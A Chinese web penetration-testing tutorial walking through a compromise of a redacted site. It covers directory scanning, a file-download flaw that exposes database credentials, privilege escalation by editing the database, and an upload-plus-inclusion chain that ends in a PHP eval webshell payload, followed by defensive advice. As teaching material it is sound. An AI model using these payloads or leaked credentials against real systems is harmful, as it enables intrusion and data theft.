网站基础渗透实战教学文档<\/h1>

信息收集阶段<\/h2>

1. 目录扫描<\/h3>
使用Goby工具进行目录扫描，发现以下关键路径：<\/p>
[200][text\/html][0b] http:\/\/www.xxxxxx\/adm\/
[200][text\/html][0b] http:\/\/www.xxxxxx\/adm\/index.php
[200][text\/html][8.21kb] http:\/\/www.xxxxxx\/manual\/index.html
[200][text\/html; charset=utf-8][8.48kb] http:\/\/www.xxxxxx\/phpMyAdmin\/
[200][text\/html][780.00b] http:\/\/www.xxxxxx\/root\/
[200][text\/html][21.69kb] http:\/\/www.xxxxxx\/temp\/
<\/code><\/pre>
2. 敏感文件发现<\/h3>

发现index.bak备份文件<\/li>
发现phpMyAdmin管理界面<\/li>
发现多个管理目录(adm\/, manage\/, manager\/)<\/li>
<\/ul>
3. 旁站信息收集<\/h3>
通过目录结构发现多个可能存在的旁站：<\/p>
home12, home13, home2, home3, home3_test01, home4, home5, home8, home9
<\/code><\/pre>
使用FOFA插件验证旁站存在<\/p>
漏洞挖掘<\/h2>
1. 文件下载漏洞<\/h3>
发现存在文件下载漏洞的端点：<\/p>
http:\/\/www.xxxxx\/include\/download.php?f=
<\/code><\/pre>
漏洞特征：<\/p>

不输入参数直接下载download.php本身<\/li>
尝试下载\/etc\/passwd等系统文件<\/li>
通过绝对路径可下载网站文件<\/li>
<\/ul>
2. 文件下载漏洞利用<\/h3>
成功下载的关键文件：<\/p>

\/home12\/include\/database.inc<\/code> - 获取数据库凭据<\/li>
\/phpMyAdmin\/config.inc.php<\/code> - 获取可能的数据库凭据<\/li>
网站核心配置文件<\/li>
<\/ol>
3. 获取数据库凭据<\/h3>
从database.inc文件中获取到：<\/p>
$sqlServerIp =<\/span> 'localhost'<\/span>;     \/\/ sql server ip
<\/span><\/span><\/span><\/span>$userName =<\/span> 'arco'<\/span>;         \/\/ sql login name
<\/span><\/span><\/span><\/span>$passWord =<\/span> 'su3cl3'<\/span>;       \/\/ sql login password
<\/span><\/span><\/span><\/span>$dbName =<\/span> 'mdn'<\/span>;            \/\/ sql database name
<\/span><\/span><\/span><\/code><\/pre>权限提升<\/h2>
1. phpMyAdmin利用<\/h3>
使用获取的凭据登录phpMyAdmin：<\/p>

用户'arco'权限有限，无法执行高危操作<\/li>
尝试通过SELECT INTO OUTFILE写shell失败<\/li>
尝试开启general_log写shell失败(需要SUPER权限)<\/li>
<\/ul>
2. 后台登录绕过<\/h3>
分析登录逻辑发现SQL查询问题：<\/p>
$dm1_sql =<\/span> "select type from belong where uid='<\/span>$uid<\/span>' and sid='<\/span>{<\/span>$sys['sid'<\/span>]}<\/span>'"<\/span>
<\/span><\/span><\/code><\/pre>发现所有用户type=0，通过直接修改数据库将type改为1获得管理员权限<\/p>
获取Webshell<\/h2>
1. 文件上传+文件包含组合利用<\/h3>
发现两处关键漏洞：<\/p>

头像上传功能(限制为jpg\/gif)<\/li>
文件包含漏洞：<\/li>
<\/ol>
\/funn\/index.php?go=\/etc\/passwd%00
<\/code><\/pre>
2. 利用步骤<\/h3>

上传图片马(内容为PHP代码)，保存为jpg\/gif<\/li>
通过文件包含执行图片马中的代码：<\/li>
<\/ol>
\/funn\/index.php?go=\/data\/userpic\/2.jpg%00
<\/code><\/pre>

使用图片马写入webshell：<\/li>
<\/ol>
<?<\/span>php<\/span> fputs<\/span>(fopen<\/span>('..\/data\/userpic\/shell.php'<\/span>,'w'<\/span>),'<?php @eval($_POST[cmd])?>'<\/span>);?><\/span>
<\/span><\/span><\/span><\/code><\/pre>技术要点总结<\/h2>


信息收集要全面<\/strong>：不仅扫描主站，还要注意目录结构暴露的旁站信息<\/p>
<\/li>

文件下载漏洞利用<\/strong>：<\/p>

尝试系统敏感文件(\/etc\/passwd等)<\/li>
通过绝对路径下载网站配置文件<\/li>
重点查找包含数据库凭据的文件<\/li>
<\/ul>
<\/li>

权限绕过技巧<\/strong>：<\/p>

分析登录逻辑中的SQL查询<\/li>
注意用户权限字段(如type、status等)<\/li>
直接修改数据库关键字段<\/li>
<\/ul>
<\/li>

组合漏洞利用<\/strong>：<\/p>

文件上传+文件包含<\/li>
使用00截断绕过限制(PHP版本<5.3.4)<\/li>
注意路径问题(绝对路径\/相对路径)<\/li>
<\/ul>
<\/li>

phpMyAdmin利用限制<\/strong>：<\/p>

注意用户权限(SELECT INTO OUTFILE需要FILE权限)<\/li>
general_log需要SUPER权限<\/li>
低权限用户可尝试读取数据而非直接getshell<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

禁用不必要的目录列表<\/li>
限制文件下载功能的目录访问范围<\/li>
数据库用户按最小权限原则分配<\/li>
对上传文件进行严格的内容检查而非仅扩展名检查<\/li>
禁用危险函数如fopen、fputs等或严格限制其使用范围<\/li>
及时更新PHP版本避免00截断等老版本漏洞<\/li>
<\/ol>